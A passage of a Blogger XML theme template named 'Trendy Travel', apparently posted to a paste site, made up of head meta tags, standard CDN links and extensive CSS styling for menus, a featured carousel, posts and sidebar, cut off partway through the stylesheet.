· 6 years ago · Mar 31, 2020, 11:02 AM
1<?xml version="1.0" encoding="UTF-8" ?>
2<!DOCTYPE html>
3<html b:version='2' class='v2' expr:dir='data:blog.languageDirection' xmlns='http://www.w3.org/1999/xhtml' xmlns:b='http://www.google.com/2005/gml/b' xmlns:data='http://www.google.com/2005/gml/data' xmlns:expr='http://www.google.com/2005/gml/expr'>
4 <head>
5 <meta content='width=device-width, initial-scale=1, maximum-scale=1' name='viewport'/>
6 <link href='http://fonts.googleapis.com/css?family=Handlee|Open+Sans+Condensed:300,700' media='all' rel='stylesheet' type='text/css'/>
7 <script src='https://ajax.googleapis.com/ajax/libs/jquery/1.11.0/jquery.min.js' type='text/javascript'/>
8 <link href='//maxcdn.bootstrapcdn.com/font-awesome/4.5.0/css/font-awesome.min.css' rel='stylesheet'/>
9 <b:include data='blog' name='all-head-content'/>
10 <title>
11 <b:if cond='data:blog.pageType == "index"'>
12 <data:blog.pageTitle/>
13 <b:else/>
14 <b:if cond='data:blog.pageType != "error_page"'>
15 <data:blog.pageName/> - <data:blog.title/>
16 <b:else/>
17 ERROR 404 - <data:blog.title/>
18 </b:if>
19 </b:if>
20 </title>
21 <!-- Description and Keywords (start) -->
22 <b:if cond='data:blog.pageType == "index"'>
23 <meta content='YOUR DESCRIPTION HERE' name='description'/>
24 </b:if>
25 <meta content='YOUR KEYWORDS HERE' name='keywords'/>
26 <!-- Description and Keywords (end) -->
27 <b:if cond='data:blog.pageType == "item"'>
28 <meta expr:content='data:blog.pageName' property='og:title'/>
29 <meta expr:content='data:blog.canonicalUrl' property='og:url'/>
30 <meta content='article' property='og:type'/>
31 </b:if>
32 <b:if cond='data:blog.postImageUrl'>
33 <meta expr:content='data:blog.postImageUrl' property='og:image'/>
34 <b:else/>
35 <b:if cond='data:blog.postImageThumbnailUrl'>
36 <meta expr:content='data:blog.postImageThumbnailUrl' property='og:image'/>
37 </b:if></b:if>
38 <b:if cond='data:blog.metaDescription != ""'>
39 <meta expr:content='data:blog.metaDescription' name='og:description'/>
40 </b:if>
41 <meta expr:content='data:blog.title' property='og:site_name'/>
42 <meta expr:content='data:blog.homepageUrl' name='twitter:domain'/>
43 <meta expr:content='data:blog.pageName' name='twitter:title'/>
44 <b:if cond='data:blog.postImageUrl'>
45 <meta content='summary_large_image' name='twitter:card'/>
46 <meta expr:content='data:blog.postImageUrl' name='twitter:image'/>
47 <b:else/>
48 <meta content='summary' name='twitter:card'/>
49 <b:if cond='data:blog.postImageThumbnailUrl'>
50 <meta expr:content='data:blog.postImageThumbnailUrl' name='twitter:image'/>
51 </b:if>
52 </b:if>
53 <meta expr:content='data:blog.pageName' name='twitter:title'/>
54 <b:if cond='data:blog.metaDescription'>
55 <meta expr:content='data:blog.metaDescription' name='twitter:description'/>
56 </b:if>
57 <!-- Social Media meta tag need customer customization -->
58 <meta content='hawee19' property='fb:app_id'/>
59 <meta content='hawee19' property='fb:admins'/>
60 <meta content='@haweeck' name='twitter:site'/>
61 <meta content='@haweeck' name='twitter:creator'/>
62 <b:skin><![CDATA[
63
64/* ######## Navigation Menu Css by sorabloggingtips.com ######################### */
65.mapasite {
66 margin-bottom: 10px;
67 background-color: #F8F8F8
68}
69.mapasite.active .mapa {
70 display: block
71}
72.mapasite .mapa {
73 display: none
74}
75.mapasite h2 {
76 background-color: #EEE;
77 color: #000;
78 font-size: 15px;
79 padding: 10px 20px;
80 border-radius: 2px;
81 margin-bottom: 0;
82 cursor: pointer;
83 font-weight: 700
84}
85.mapasite h2 .botao {
86 font-size: 18px;
87 line-height: 1.2em
88}
89.botao .fa-minus-circle {
90 color: #f30
91}
92.mapapost {
93 overflow: hidden;
94 margin-bottom: 20px;
95 height: 70px;
96 background-color: #FFF
97}
98.mapa {
99 padding: 40px
100}
101.map-thumb {
102 background-color: #F0F0F0;
103 padding: 10px;
104 display: block;
105 width: 65px;
106 height: 50px;
107 float: left
108}
109.map-img {
110 width: 65px;
111 height: 50px;
112 overflow: hidden;
113 border-radius: 2px
114}
115.map-thumb a {
116 width: 100%;
117 height: 100%;
118 display: block;
119 transition: all .3s ease-out!important;
120 -webkit-transition: all .3s ease-out!important;
121 -moz-transition: all .3s ease-out!important;
122 -o-transition: all .3s ease-out!important
123}
124.map-thumb a:hover {
125 -webkit-transform: scale(1.1) rotate(-1.5deg)!important;
126 -moz-transform: scale(1.1) rotate(-1.5deg)!important;
127 transform: scale(1.1) rotate(-1.5deg)!important;
128 transition: all .3s ease-out!important;
129 -webkit-transition: all .3s ease-out!important;
130 -moz-transition: all .3s ease-out!important;
131 -o-transition: all .3s ease-out!important
132}
133.mapapost .wrp-titulo {
134 padding-top: 10px;
135 font-weight: 700;
136 font-size: 14px;
137 line-height: 1.3em;
138 padding-left: 25px;
139 padding-right: 10px;
140 display: block;
141 overflow: hidden;
142 margin-bottom: 5px
143}
144.mapapost .wrp-titulo a {
145
146}
147.mapapost .wrp-titulo a:hover {
148 color: #f30;
149 text-decoration: underline
150}
151.map-meta {
152 display: block;
153 float: left;
154 overflow: hidden;
155 padding-left: 25px;
156}
157.mapasite h2 .botao {
158 float: right
159}/*
160-----------------------------------------------
161Blogger Template Style
162Name: Trendy Travel
163Author : http://www.way2themes.com
164License: Free Version
165----------------------------------------------- */
166/*****************************************
167reset.css
168******************************************/
169html, body, .section, .widget, div, span, applet, object, iframe,
170h1, h2, h3, h4, h5, h6, p, blockquote, pre,
171a, abbr, acronym, address, big, cite, code,
172del, dfn, em, font, img, ins, kbd, q, s, samp,
173small, strike, strong, sub, sup, tt, var,
174dl, dt, dd, ol, ul, li,
175fieldset, form, label, legend,
176table, caption, tbody, tfoot, thead, tr, th, td, figure { margin: 0; padding: 0;}
177html { overflow-x: hidden;}
178a {text-decoration:none;color:#000;}
179article,aside,details,figcaption,figure,
180footer,header,hgroup,menu,nav,section { display:block;}
181table { border-collapse: separate; border-spacing: 0;}
182caption, th, td { text-align: left; font-weight: normal;}
183blockquote:before, blockquote:after,
184q:before, q:after { content: "";}
185.quickedit, .home-link{display:none;}
186blockquote, q { quotes: "" "";}
187sup{ vertical-align: super; font-size:smaller;}
188code{ font-family: 'Courier New', Courier, monospace; font-size:12px; color:#272727;}
189::selection {background:transparent; text-shadow:#000 0 0 2px;}
190::-moz-selection {background:transparent; text-shadow:#000 0 0 2px;}
191::-webkit-selection {background:transparent; text-shadow:#000 0 0 2px;}
192::-o-selection {background:transparent; text-shadow:#000 0 0 2px;}
193a img{border:none;}
194.widget img{max-width:100%;}
195ol, ul { padding:0; margin:0; text-align: left; }
196ol li { list-style-type: decimal; padding:0 0 5px; }
197ul li { list-style-type: disc; padding: 0 0 5px; }
198ul ul, ol ol { padding: 0; }
199#navbar-iframe, .navbar { height:0px; visibility:hidden; display:none }
200#HTML300, #Text100, .post-footer-line.post-footer-line-1, .post-footer-line.post-footer-line-2 , .post-footer-line.post-footer-line-3 {
201display: none;
202}
203.item-control {
204display: none !important;
205}
206h2.date-header, h4.date-header {display:none;margin:1.5em 0 .5em}
207h1, h2, h3, h4, h5, h6 {
208font-family: 'Handlee';
209color: #2e2e2e;
210}
211blockquote {
212padding: 8px;
213background-color: #faebbc;
214border-top: 1px solid #e1cc89;
215border-bottom: 1px solid #e1cc89;
216margin: 5px;
217background-image: url(http://1.bp.blogspot.com/-siy6EKYCLtM/U6X4AdKrr0I/AAAAAAAANDs/HCjRvuedDro/s1600/openquote1.gif);
218background-position: top left;
219background-repeat: no-repeat;
220text-indent: 23px;
221}
222blockquote p{
223display: block;
224background-image: url(http://3.bp.blogspot.com/-UjppXQI-ww0/U6X4IpheNiI/AAAAAAAAND0/PJhRvvhAWGU/s1600/closequote1.gif);
225background-repeat: no-repeat;
226background-position: bottom right;
227}
228/*****************************************
229Custom css starts
230******************************************/
231body {
232color: #2e2e2e;
233font-family:'Open Sans Condensed', sans-serif;
234font-size: 14px;
235font-weight: normal;
236line-height: 21px;
237background: #ffffff;
238}
239/* ######## Wrapper Css ######################### */
240#outer-wrapper{max-width:100%;margin:0 auto;background-color:#f9f9f9;box-shadow:0 0 5px RGBA(0, 0, 0, 0.2)}
241.row{width:1170px}
242#content-wrapper {
243margin: 0 auto;
244padding: 20px 0;
245overflow: hidden;
246}
247
248#main-wrapper {
249float: left;
250width: 67%;
251max-width: 800px;
252}
253
254#sidebar-wrapper {
255float: right;
256width: 30%;
257max-width: 360px;
258display:block;
259}
260/* ######## Top Header Bar Css ######################### */
261.top-bar {
262background: #222222;
263}
264.top-bar-wrapper {
265position: relative;
266min-height:40px;
267color: #aaaaaa;
268margin:0 auto;
269}
270.top-bar-social {
271float: right;
272padding: 5px 0;
273}
274.top-bar-social li {
275display: inline;
276padding: 0;
277float: left;
278margin-right: 5px;
279;
280}
281.top-bar-social .widget ul {
282padding: 0;
283}
284.top-bar-social .LinkList ul {
285text-align: center;
286margin: 0 20px 0 0;
287}
288.top-bar-social #social a {
289display: block;
290width: 30px;
291height: 30px;
292line-height: 30px;
293font-size: 15px;
294color: #aaaaaa;
295transition: background 0.3s linear;
296-moz-transition: background 0.3s linear;
297-webkit-transition: background 0.3s linear;
298-o-transition: background 0.3s linear;
299}
300.top-bar-social #social a:before {
301display: inline-block;
302font: normal normal normal 22px/1 FontAwesome;
303font-size: inherit;
304font-style: normal;
305font-weight: 400;
306-webkit-font-smoothing: antialiased;
307-moz-osx-font-smoothing: grayscale;
308}
309.top-bar-social .bloglovin:before{content:"\f004"}
310.top-bar-social .facebook:before{content:"\f09a"}
311.top-bar-social .twitter:before{content:"\f099"}
312.top-bar-social .gplus:before{content:"\f0d5"}
313.top-bar-social .rss:before{content:"\f09e"}
314.top-bar-social .youtube:before{content:"\f167"}
315.top-bar-social .skype:before{content:"\f17e"}
316.top-bar-social .stumbleupon:before{content:"\f1a4"}
317.top-bar-social .tumblr:before{content:"\f173"}
318.top-bar-social .vine:before{content:"\f1ca"}
319.top-bar-social .stack-overflow:before{content:"\f16c"}
320.top-bar-social .linkedin:before{content:"\f0e1"}
321.top-bar-social .dribbble:before{content:"\f17d"}
322.top-bar-social .soundcloud:before{content:"\f1be"}
323.top-bar-social .behance:before{content:"\f1b4"}
324.top-bar-social .digg:before{content:"\f1a6"}
325.top-bar-social .instagram:before{content:"\f16d"}
326.top-bar-social .pinterest:before{content:"\f0d2"}
327.top-bar-social .delicious:before{content:"\f1a5"}
328.top-bar-social .codepen:before{content:"\f1cb"}
329.top-bar-social ul#social a:hover {
330color: #fff;
331opacity: 1;
332}
333.top-bar-menu {
334float: left;
335}
336.top-menu ul {
337overflow: hidden;
338list-style: none;
339padding: 0;
340margin: 0;
341}
342.top-menu ul li {
343float: left;
344display: inline-block;
345list-style: none;
346padding: 0;
347}
348.top-menu ul li a {
349padding: 10px 16px;
350display: block;
351border: none !important;
352text-decoration: none;
353line-height: inherit;
354font-size: 14px;
355font-weight: normal;
356color: #aaaaaa;
357}
358.selectnav {display:none}
359/* ######## Header Css ######################### */
360.header-wrapper {
361text-align: center;
362padding: 42px 0;
363background:#fff
364}
365#header-inner {
366text-align: center;
367display: inline-block;
368}
369.header-wrapper img {
370width:100%;
371}
372/* ######## Search widget Css ######################### */
373#search-bar {
374position: absolute;
375right: 0;
376top: 0;
377}
378.header-search {
379color: #fff;
380position: absolute;
381top: 5px;
382right: 0;
383}
384.header-search i {
385font-style: normal;
386font-size: 13px;
387cursor: pointer;
388}
389.header-search .fa-times.active, .fa-search {
390display: inline-block;
391}
392.header-search .fa-times,.fa-search.active {
393display: none;
394}
395.search-form {
396display: none;
397position: absolute;
398top: 35px;
399right: 0;
400padding: 5px;
401background: #fed130;
402z-index: 9999;
403transition: none;
404}
405.search-form input {
406border: 1px solid #e9e9e9;
407height: 36px;
408text-indent: 5px;
409}
410.search-form button {
411border: none;
412border-radius: 3px;
413color: #ffffff;
414cursor: pointer;
415font-size: 14px;
416height: 36px;
417width: 36px;
418position: relative;
419background: #ff6644;
420}
421.iconheader {
422position: relative;
423float: right;
424}
425.iconheader a i {
426font-size: 18px;
427line-height: 80px;
428margin-left: 10px;
429color: #999;
430}
431.iconheader a i:hover {
432color:#E80007;
433}
434/* ######## Navigation Menu Css ######################### */
435.navi-menu {
436text-align: center;
437margin: 0 auto;
438padding: 0;
439width: 100%;
440background: #fff;
441 border-bottom: 1px solid rgba(0,0,0,.09);
442}
443.nav-menu {
444margin: 0 auto;
445border-top: 1px solid rgba(0,0,0,.09);
446}
447.selectnav {
448display:none;
449}
450.nav-menu {
451padding: 0;
452}
453.nav-menu ul {
454list-style: none;
455margin: 0;
456padding: 0;
457z-index: 999;
458text-align: center;
459}
460.nav-menu ul li {
461display: inline-block;
462line-height: 1;
463list-style: none outside none;
464padding: 0;
465text-align: left;
466position: relative;
467}
468.nav-menu li a {
469background: transparent;
470color: #aaaaaa;
471display: block;
472font-size: 14px;
473padding: 22px 20px;
474position: relative;
475text-decoration: none;
476text-transform: uppercase;
477font-weight: 700;
478font-style: normal;
479letter-spacing: 1px;
480}
481.nav-menu ul li:after {
482 content: "|";
483 display: block;
484 position: absolute;
485 margin: auto;
486 top: -15px;
487right: -5px;
488 bottom: 0;
489 width: 8px;
490 height: 8px;
491 text-align: center;
492 font-weight: 400;
493 font-size: 20px;
494 text-rendering: auto;
495 -webkit-font-smoothing: antialiased;
496 -moz-osx-font-smoothing: grayscale;
497 color: #dddddd;
498}
499.nav-menu ul li:last-child:after {
500display: none;
501}
502.nav-menu li a i {
503margin-right: 3px;
504}
505.nav-menu li a:hover, .nav-menu li a:hover .nav-menu ul li.hasSub a:after {
506background:#fff;
507color:#000;
508}
509.nav-menu ul li li a:hover {
510padding-left: 20px;
511}
512.nav-menu ul li ul {
513width: 180px;
514margin: 0px;
515position: absolute;
516visibility: hidden;
517display: inline;
518padding: 0px;
519height: auto;
520border-top-width:0;
521background: #fff;
522-webkit-box-shadow: 0 1px 0 1px rgba(0,0,0,.1);
523box-shadow: 0 1px 0 1px rgba(0,0,0,.1);
524}
525.nav-menu ul li ul li ul {
526left:180px;
527top:0;
528display:none;
529}
530.nav-menu ul li:hover ul {
531visibility: visible;
532}
533.nav-menu ul li ul li:hover ul {
534display:inline;
535}
536.nav-menu li li a {
537color: #000000;
538font-size: 14px;
539padding: 15px 15px;
540position: relative;
541text-align: left;
542-webkit-transition: color .15s linear 0s,padding-left .15s linear 0s;
543}
544.nav-menu li li {
545float: none !important;
546display: block;
547position:relative;
548}
549.nav-menu a#pull {
550display: none;
551}
552.nav-menu ul li.hasSub a {
553padding-right: 25px
554}
555.nav-menu ul li.hasSub a:after {
556color: #aaa;
557position: absolute;
558top: 22px;
559right: 10px;
560display: block;
561content: "\f0d7";
562font-family: FontAwesome;
563font-weight: 400;
564font-size: 15px;
565text-rendering: auto;
566-webkit-font-smoothing: antialiased;
567-moz-osx-font-smoothing: grayscale
568}
569.nav-menu ul li.hasSub ul li a:after {
570display: none!important
571}
572/* ######## Featured Widget Css ######################### */
573.featured-slider-wrap {
574 position: relative;
575 padding: 15px;
576 overflow: hidden;
577 background: #ffffff;
578 border: 1px solid #eee;
579 margin: 15px auto !important;
580}
581#label_with_thumbs .widget-thumb {
582position: relative;
583width: 100%;
584height: 450px;
585overflow: hidden;
586display: block;
587vertical-align: middle;
588margin: 0!important;
589}
590#label_with_thumbs .widget-thumb .label_thumb {
591position: relative;
592height:100%;
593width: 100%;
594display: block;
595}
596
597#label_with_thumbs .widget-con {
598position: absolute;
599 left: 0;
600 bottom: 0;
601 width: 100%;
602 padding: 20px 10px;
603 z-index: 2;
604 box-sizing: border-box;
605}
606#label_with_thumbs .post-tag {
607color: #fff;
608text-transform: capitalize;
609letter-spacing: 1px;
610font-weight: 400;
611font-style: normal;
612 border: 1px solid #fff;
613padding: 4px 8px;
614margin-right: 8px;
615border-radius: 2px;
616font-size: 12px;
617display: inline-block;
618margin-bottom: 2px;
619text-align: center;
620}
621#label_with_thumbs {
622float: left;
623width: 100%;
624min-height: 70px;
625margin:0;
626padding: 0;
627}
628
629#label_with_thumbs li {
630width: 100%;
631float: left;
632margin-left: 0;
633border:none;
634position:relative;
635 margin-top: -15px;
636 list-style-type: none;
637}
638
639#label_with_thumbs li .widget-sum {
640display: none;
641font-size: 16px;
642line-height: 1.5em;
643font-weight: 400;
644margin: 7px 0 3px;
645color: #fff;
646text-align: justify;
647}
648
649#label_with_thumbs .recent-title {
650overflow: hidden;
651 font-weight: 700;
652 font-size: 16px;
653 line-height: 1.4em;
654 margin: 5px 0 4px;
655 padding: 0;
656 letter-spacing: 1px;
657}
658#label_with_thumbs .recent-title a {
659color: #fff;
660transition: color .3s;
661}
662#label_with_thumbs li:nth-child(1) .widget-meta, #label_with_thumbs li:nth-child(1) .widget-meta a {
663color:#ffffff;
664}
665.widget-meta {
666color: #030303;
667font-size: 11px;
668font-weight: 400;
669}
670.img-overlay {
671 position: absolute;
672 left: 0;
673 top: 0;
674 z-index: 1;
675 width: 100%;
676 height: 100%;
677 -webkit-box-shadow: 0 0 20px rgba(0,0,0,.8);
678 box-shadow: 0 0 20px rgba(0,0,0,.8);
679 background-color: #000;
680 opacity: 0.3;
681}
682.owl-carousel .owl-wrapper:after {
683content: ".";
684display: block;
685clear: both;
686visibility: hidden;
687line-height: 0;
688height: 0;
689}
690.owl-carousel {
691display: none;
692position: relative;
693width: 100%;
694-ms-touch-action: pan-y;
695}
696.owl-carousel .owl-wrapper {
697display: none;
698position: relative;
699-webkit-transform: translate3d(0px, 0px, 0px);
700}
701.owl-carousel .owl-wrapper-outer {
702overflow: hidden;
703position: relative;
704width: 100%;
705}
706.owl-carousel .owl-wrapper-outer.autoHeight {
707-webkit-transition: height 500ms ease-in-out;
708-moz-transition: height 500ms ease-in-out;
709-ms-transition: height 500ms ease-in-out;
710-o-transition: height 500ms ease-in-out;
711transition: height 500ms ease-in-out;
712}
713.owl-controls .owl-page,
714.owl-controls .owl-buttons div {
715cursor: pointer;
716}
717.owl-controls {
718-webkit-user-select: none;
719-khtml-user-select: none;
720-moz-user-select: none;
721-ms-user-select: none;
722user-select: none;
723-webkit-tap-highlight-color: rgba(0, 0, 0, 0);
724}
725.grabbing,
726.grabbing a,
727.grabbing * {
728cursor: e-resize!important;
729}
730.owl-carousel .owl-wrapper,
731.owl-carousel .owl-item {
732-webkit-backface-visibility: hidden;
733-moz-backface-visibility: hidden;
734-ms-backface-visibility: hidden;
735-webkit-transform: translate3d(0, 0, 0);
736-moz-transform: translate3d(0, 0, 0);
737-ms-transform: translate3d(0, 0, 0);
738}
739.owl-prev,
740.owl-next {
741top: 40px;
742color: #fff;
743font-family: FontAwesome;
744position: absolute;
745z-index: 1;
746display: block;
747padding: 0;
748cursor: pointer;
749padding: 0;
750text-align: center;
751overflow: hidden;
752width: 50px;
753height: 50px;
754line-height: 50px;
755border: solid 2px #fff;
756background:#fed130;
757opacity:0.7;
758}
759.label_with_thumbs .owl-prev,
760.label_with_thumbs .owl-next {
761margin-top: 0px;
762font-size: 25px;
763}
764.label_with_thumbs .owl-prev {
765left: 50px;
766border-right: none;
767}
768.label_with_thumbs .owl-next {
769right: 50px;
770}
771.label_with_thumbs .owl-dots {
772bottom: 10px
773}
774.owl-next:before {
775font-family: fontawesome;
776}
777.owl-prev:before {
778font-family: fontawesome;
779}
780.owl-carousel {
781padding: 5px 0;
782}
783.label_with_thumbs .owl-carousel {
784border: 0;
785padding: 0;
786}
787.label_with_thumbs .owl-item li {
788margin: 0;
789padding: 0;
790}
791.label_with_thumbs .owl-prev:hover,
792.label_with_thumbs .owl-next:hover {
793opacity: .9;
794background:rgba(0, 0, 0, 0.5);
795}
796.owl-next:before {
797content: '\f105';
798font-family: fontawesome;
799}
800.owl-prev:before {
801content: '\f104';
802font-family: fontawesome;
803}
804.owl-carousel .owl-item {
805float: left;
806}
807.box-title .owl-controls {
808float: right;
809}
810.label_with_thumbs .owl-item li img {
811height: auto;
812width: 100%;
813}
814.label_with_thumbs .owl-item li .thumb-hover {
815content: no-close-quote;
816position: absolute;
817bottom: -5px;
818width: 100%;
819background: url(http://2.bp.blogspot.com/-_IyTmlpHtg8/Vmi5pkn5ZAI/AAAAAAAACVI/G4Kylbm3CDo/s1600-r/gradient.png) repeat-x 0 -1px;
820opacity: .8;
821left: 0;
822opacity: .9;
823background-size: 200px 100%;
824height: 200px;
825}
826/* ######## Sidebar Css ######################### */
827.sidebar .widget {
828margin-bottom: 20px;
829position: relative;
830}
831.sidebar h2 {
832background: #ffffff;
833color: #333333;
834border: 1px solid #eeeeee;
835border-top: 3px solid #fed130;
836border-bottom-color: #e9e9e9;
837font-size: 18px;
838padding: 18px 30px;
839letter-spacing: 1.5px;
840text-transform: capitalize;
841position: relative;
842text-align: left;
843}
844.sidebar ul,.sidebar li{
845list-style-type:none;
846margin:0;
847}
848#sidebar .widget-content {
849background: #ffffff;
850border: 1px solid #eaeaea;
851border-bottom: 2px solid #e8e8e8;
852border-top: 0px;
853 padding: 20px 15px;
854}
855/* ######## Post Css ######################### */
856article {
857 padding: 0;
858}
859.post-outer {
860 padding: 0 0 20px 0;
861}
862.index .post, .archive .post {
863text-align:center;
864}
865.post {
866 display: block;
867 overflow: hidden;
868 word-wrap: break-word;
869background: #ffffff;
870 border: 1px solid #efefef;
871}
872.post h2 {
873margin-bottom: 12px;
874line-height: 37px;
875 font-size: 32px;
876 font-weight: 700;
877}
878.post h2 a {
879color: #000;
880letter-spacing: 1px;
881}
882.post h2 {
883 margin: 0 0 10px;
884 padding: 0;
885}
886
887
888.retitle h2 {
889 margin: 8px 0;
890 display: block;
891}
892.post-body {
893margin: 0px;
894padding:10px;
895font-size: 14px;
896line-height: 26px;
897width: auto;
898word-wrap: break-word;
899}
900.block-image {
901float: none;
902margin: 0 auto;
903clear: both;
904width: 100%;
905}
906.block-image .thumb {
907width: 100%;
908height: 400px;
909position: relative;
910display: block;
911overflow: hidden;
912}
913.block-image a {
914width: 100%;
915height: 400px;
916display: block;
917transition: all .3s ease-out!important;
918-webkit-transition: all .3s ease-out!important;
919-moz-transition: all .3s ease-out!important;
920-o-transition: all .3s ease-out!important;
921}
922.date-header {
923 color: #bdbdbd;
924 display: block;
925 font-size: 12px;
926 font-weight: 400;
927 line-height: 1.3em;
928 margin: 0!important;
929 padding: 0;
930}
931.date-header a {
932 color: #bdbdbd;
933}
934.post-header {
935 padding: 10px;
936}
937#meta-post {
938float:right;
939display:inline-block;
940}
941#meta-post .fa-calendar-o {
942 margin-left: 8px;
943}
944.tag {
945 display: inline-block;
946 border-bottom: 2px solid #fed130;
947float:left;
948}
949.tag span.tag-icon {
950background: #fed130;
951color: #fff;
952display: inline-block;
953 margin: 0 5px 0px 0;
954position: relative;
955padding: 2px 8px;
956z-index: 1;
957}
958.tag span.tag-name {
959 padding: 2px 6px 2px 0;
960 font-size: 12px;
961 font-family: Handlee;
962 text-transform: uppercase;
963 font-weight: bold;
964 letter-spacing: 1px;
965}
966.post-meta {
967 color: #bdbdbd;
968 display: block;
969 font-size: 13px;
970 font-weight: 400;
971 line-height: 21px;
972 margin: 0;
973 padding: 0;
974}
975.post-meta a, .post-meta i {
976 color: #CBCBCB;
977}
978.post-timestamp {
979 margin-left: 5px;
980}
981.label-head {
982 margin-left: 5px;
983}
984.label-head a {
985 padding-left: 2px;
986}
987.index-post-head {
988 padding: 10px;
989}
990.resumo {
991 margin-top: 10px;
992 color: #777;
993 padding: 0 15px;
994}
995.resumo span {
996 display: block;
997 margin-bottom: 8px;
998font-size: 18px;
999 line-height: 25px;
1000 text-align: justify;
1001}
1002.resumo span:first-letter {
1003float: left;
1004 font-family: 'Handlee';
1005font-size: 40px;
1006line-height: 40px;
1007display: block;
1008text-align: center;
1009margin-right: 22px;
1010margin-top: 10px;
1011padding: 10px 14px;
1012margin-bottom: 10px;
1013border: 1px solid #ebebeb;
1014color:#2b2b2b;
1015}
1016.post img {
1017max-width: 100%;
1018padding: 0;
1019position: relative;
1020margin:0 auto;
1021}
1022.post h3 {
1023font-size: 18px;
1024margin-top: 20px;
1025margin-bottom: 10px;
1026line-height: 1.1;
1027}
1028.second-meta {
1029 padding:10px 10px;
1030display: block;
1031overflow: hidden;
1032}
1033.meta-top {
1034border-bottom: 1px dashed #ededed;
1035border-top:none !important;
1036padding: 0 0 10px !important;
1037}
1038.meta-botom, .meta-top {
1039 display: block;
1040 overflow: hidden;
1041 border-bottom: 1px dashed #ededed;
1042 padding: 10px 10px 0;
1043 margin-top: 10px;
1044}
1045.meta-botom .share-art {
1046position: relative;
1047}
1048.meta-botom .share-art span {
1049display: none;
1050}
1051.meta-botom .post-cmm {
1052float: left;
1053position: relative;
1054color: #000000;
1055background: #FFF;
1056padding: 0px;
1057height: 35px;
1058line-height: 32px;
1059text-transform: capitalize;
1060font-size: 12px;
1061letter-spacing: 1px;
1062}
1063.meta-botom .share-art {
1064float: right;
1065padding: 0;
1066padding-top: 0;
1067font-size: 13px;
1068font-weight: 400;
1069text-transform: capitalize;
1070}
1071.meta-botom .share-art a {
1072color: #fff;
1073padding: 5px 10px;
1074margin-left: 4px;
1075border-radius: 2px;
1076display: inline-block;
1077margin-right: 0;
1078}
1079.meta-botom .share-art i {color:#333;opacity:.7;}
1080.meta-botom .share-art a:hover i{opacity:1;}
1081.read-more {
1082font-size: 14px;
1083font-weight: bold;
1084font-family: 'Handlee';
1085width: 175px;
1086height: 50px;
1087line-height: 46px;
1088text-transform: uppercase;
1089word-spacing: 0.2em;
1090color: #fff;
1091display: table;
1092margin: 0px auto 0;
1093background-color: #333;
1094vertical-align: middle;
1095position: relative;
1096-webkit-backface-visibility: hidden;
1097backface-visibility: hidden;
1098transition-duration: 0.35s;
1099}
1100.read-more:hover {
1101color: #fff;
1102background:#fed130;
1103transition-duration: 0.3s;
1104}
1105.read-more:before, .read-more:after {
1106position: absolute;
1107content: "";
1108left: 0;
1109bottom: 0;
1110right: 0;
1111top: 0;
1112opacity: 0;
1113-webkit-transition: opacity 0.35s,transform 0.5s;
1114transition: opacity 0.35s,transform 0.5s;
1115}
1116.read-more:before {
1117border-bottom: 2px solid #333;
1118border-top: 2px solid #333;
1119-webkit-transform: scale(0, 1);
1120transform: scale(0, 1);
1121}
1122.read-more:after {
1123border-right: 2px solid #333;
1124border-left: 2px solid #333;
1125-webkit-transform: scale(1, 0);
1126transform: scale(1, 0);
1127}
1128.read-more > span {
1129text-align: center;
1130display: block;
1131margin: 2px;
1132position: absolute;
1133left: 0;
1134top: 0;
1135right: 0;
1136bottom: 0;
1137}
1138.read-more:hover {
1139opacity: 1;
1140-webkit-transition: opacity 0.2s;
1141transition: opacity 0.2s;
1142}
1143.read-more:hover:before, .read-more:hover:after {
1144opacity: 1;
1145-webkit-transform: scale(1);
1146transform: scale(1);
1147}
1148.comment-link {
1149 white-space: normal;
1150}
1151#blog-pager {
1152clear: both;
1153text-align: center;
1154padding: 15px 0;
1155color: #4d4d4d;
1156}
1157.displaypageNum a,
1158.showpage a,
1159.pagecurrent, .blog-pager-older-link, .blog-pager-newer-link {
1160padding: 5px 13px;
1161margin-right: 8px;
1162color: #fff;
1163background-color: #aaa;
1164display: inline-block;
1165line-height: 20px;
1166-moz-border-radius: 2px;
1167-webkit-border-radius: 2px;
1168border-radius: 2px;
1169margin-top: 10px;
1170 font-family: 'Handlee';
1171}
1172.displaypageNum a:hover,
1173.showpage a:hover,
1174.pagecurrent, .blog-pager-older-link:hover, .blog-pager-newer-link:hover {
1175background:#fed130;
1176text-decoration: none;
1177color: #fff;
1178}
1179#blog-pager .showpage,
1180#blog-pager {
1181padding: 5px 10px;
1182font: normal 13px arial;
1183text-align: center;
1184color: #000;
1185float: none;
1186}
1187.showpageOf {
1188 float: none;
1189 text-align: center;
1190 display: block;
1191 clear: both;
1192 margin: 30px auto 0;
1193 color: #aaa;
1194 font-size: 14px;
1195 font-family: Handlee;
1196 font-style: italic;
1197 letter-spacing: 1px;
1198}
1199#blog-pager .pages {
1200margin: 10px 0;
1201border: none;
1202}
1203/* ######## Related Post Css ######################### */
1204#related-posts {
1205 margin: 10px 0;
1206 overflow: hidden;
1207 padding: 0 10px;
1208}
1209#related-posts .related-text {
1210display: none;
1211}
1212.related li{width:32%;position:relative;overflow:hidden;float:left;display:block;box-sizing:border-box;margin:0 0 0 2%;padding:0}
1213.related li:first-child,.related li:nth-child(4){margin-left:0}
1214.related li h3 {
1215margin-top:0;
1216}
1217.related-thumb {
1218width: 100%;
1219height: 120px;
1220overflow: hidden;
1221border-radius: 2px;
1222}
1223.related li .related-img {
1224width: 100%;
1225height: 120px;
1226display: block;
1227transition: all .3s ease-out!important;
1228-webkit-transition: all .3s ease-out!important;
1229-moz-transition: all .3s ease-out!important;
1230-o-transition: all .3s ease-out!important;
1231}
1232.related li .related-img:hover {
1233-webkit-transform: scale(1.1) rotate(-1.5deg)!important;
1234-moz-transform: scale(1.1) rotate(-1.5deg)!important;
1235transform: scale(1.1) rotate(-1.5deg)!important;
1236transition: all .3s ease-out!important;
1237-webkit-transition: all .3s ease-out!important;
1238-moz-transition: all .3s ease-out!important;
1239-o-transition: all .3s ease-out!important;
1240}
1241.related-title a {
1242font-size: 18px;
1243line-height: 1.35em;
1244padding: 10px 5px 10px 0;
1245font-weight: 400;
1246color: #010101;
1247display: block;
1248}
1249.related-title a:hover {
1250color: #777;
1251text-decoration: underline;
1252}
1253.sora-author-box {
1254border: 1px solid #f2f2f2;
1255background: #f8f8f8;
1256overflow: hidden;
1257padding: 10px;
1258margin: 10px 0;
1259}
1260.sora-author-box img {
1261float: left;
1262margin-right: 10px;
1263border-radius: 50%;
1264}
1265.sora-author-box p {
1266padding: 10px;
1267}
1268.sora-author-box b {
1269 font-family: 'Handlee';
1270font-size: 20px;
1271}
1272.footer-meta {
1273padding: 10px;
